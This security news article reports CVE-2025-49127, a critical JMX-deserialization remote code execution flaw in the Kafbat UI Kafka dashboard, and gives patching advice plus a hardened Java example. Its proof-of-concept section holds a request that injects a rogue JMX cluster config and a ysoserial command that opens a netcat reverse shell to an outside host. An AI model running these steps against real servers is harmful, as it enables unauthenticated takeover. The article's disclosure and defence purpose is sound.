
Kafbat UI Vulnerabilities Enable Arbitrary Code Execution via JMX Services

Kafbat UI, the popular open-source dashboard for Apache Kafka, has been hit by CVE-2025-49127—a critical remote-code-execution (RCE) flaw scored CVSS 10.0.

Version 1.0.0 blindly opens Java Management Extensions (JMX) connections supplied through its convenient “dynamic cluster configuration” feature.

By pointing the interface at an attacker-controlled JMX endpoint, a threat actor can trigger unsafe deserialization and run arbitrary commands on the server—no login required.

1. Attack Vector:

When administrators add a cluster, Kafbat UI builds a JMX URL from user data instead of a whitelist:

```java
// JmxMetricsRetriever.java (excerpt): host and port are taken straight from the cluster config
String jmxUrl = "service:jmx:rmi:///jndi/rmi://"
        + node.host() + ":" + c.getMetricsConfig().getPort()
        + "/jmxrmi";       // user-controlled host & port
connector.connect(env);     // triggers RMI ↔ deserialization
```

Because authentication is disabled by default (auth.type: DISABLED), anyone can send a PUT request to /api/config that sets metrics.type: "JMX" and a rogue port.

During its 30-second metrics poll, the scheduler calls connector.connect(), starting a Java RMI handshake.

A malicious server then delivers a CommonsCollections7 gadget chain generated with ysoserial, pivoting into Runtime.exec().
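The hardened counterpart of the snippet above, added here as an illustration and not Kafbat UI's own code (the project's real fix ships in 1.1.0): the host and port must pass an operator-supplied allow-list before any JMXServiceURL is built, and a process-wide ObjectInputFilter rejects every class outside the JMX/RMI plumbing. The class name, the ALLOWED_HOSTS entries and the filter pattern are assumptions.

```java
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.net.MalformedURLException;
import java.util.Map;
import java.util.Set;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;

// Added example, not Kafbat UI code: the hardened shape of the JMX connect path.
public final class SafeJmxConnect {
    // Assumption: operator-maintained allow-list of broker hosts that may be polled.
    private static final Set<String> ALLOWED_HOSTS =
            Set.of("kafka-1.internal", "kafka-2.internal", "kafka-3.internal");

    // Build the URL only for an allow-listed host and a sane port. The regex is a
    // second line of defence: nothing can smuggle extra URL or JNDI components
    // into the string even if the allow-list is later loaded from config.
    static JMXServiceURL buildUrl(String host, int port) throws MalformedURLException {
        if (host == null || !host.matches("[A-Za-z0-9.-]+")) {
            throw new IllegalArgumentException("JMX host contains illegal characters");
        }
        if (!ALLOWED_HOSTS.contains(host) || port < 1 || port > 65535) {
            throw new IllegalArgumentException("JMX target not on allow-list: " + host + ":" + port);
        }
        return new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + host + ":" + port + "/jmxrmi");
    }

    // Process-wide deserialization filter, the programmatic form of jdk.serialFilter.
    // First match wins: known gadget packages are rejected outright, the JMX/RMI
    // plumbing and core JDK types are allowed, and the trailing "!*" rejects
    // everything else. Assumption: the allow pattern is illustrative and must be
    // tuned to the classes that really appear on the JMX stream. Call once at startup.
    static void installSerialFilter() {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                "!org.apache.commons.collections.**;!org.apache.commons.collections4.**;"
              + "java.**;javax.management.**;javax.security.auth.**;sun.rmi.**;!*");
        ObjectInputFilter.Config.setSerialFilter(filter);   // may be set only once per JVM
    }

    static JMXConnector connect(String host, int port, Map<String, ?> env) throws IOException {
        JMXServiceURL url = buildUrl(host, port);            // validated before any network I/O
        return JMXConnectorFactory.connect(url, env);
    }
}
```

The config-only alternative is the jdk.serialFilter system property that the 1.1.0 release relies on; with either form, a rejected class surfaces in the logs as the "filter status: REJECTED" message referred to under Patching.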

2. Proof-of-Concept:

Researchers released a two-phase exploit that first enables unsafe deserialization, then launches a reverse shell:

```python
# cve202549127_exploit.py (excerpt)
import requests

payload = {
  "config": {
    "properties": {
      "kafka": {
        "clusters": [{
          "name": "rce",
          "bootstrapServers": "kafka-malicious-broker:9093",
          "metrics": {"type": "JMX", "port": 1719}
        }]
      }
    }
  }
}
requests.put("http://target:8080/api/config", json=payload, timeout=30)
```

Running

```text
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7 \
     "nc 192.0.2.10 9094 -e /bin/sh"
```

followed by a Netcat listener on 9094 reliably hands back a shell within seconds on a stock Docker deployment.

3. Patching and Immediate Defenses

Maintainers have shipped Kafbat UI 1.1.0, which:

  • Rejects untrusted JMX schemes and enforces allow-lists.
  • Requires authentication for the /api/config endpoint.
  • Adds a serialization filter (jdk.serialFilter) to block gadget payloads.

Operators should:

  1. docker pull ghcr.io/kafbat/kafka-ui:v1.1.0 and redeploy.
  2. Disable dynamic config in production by setting DYNAMIC_CONFIG_ENABLED: "false" in the container's environment block.
  3. Block outbound RMI (1099/tcp) and custom JMX ports at the firewall.
  4. Monitor for unsolicited service:jmx:rmi traffic; exploitation attempts leave tell-tale IllegalArgumentException: filter status: REJECTED logs once the patch is applied.

The zero-click nature of CVE-2025-49127 means unpatched dashboards are already attractive targets for crypto-miners and lateral-movement toolkits.

With proof-of-concept code public, defenders have little time: patch, segment, and monitor now—before your Kafka monitoring box becomes an attacker’s beachhead.


The post Kafbat UI Vulnerabilities Enable Arbitrary Code Execution via JMX Services appeared first on Cyber Security News.
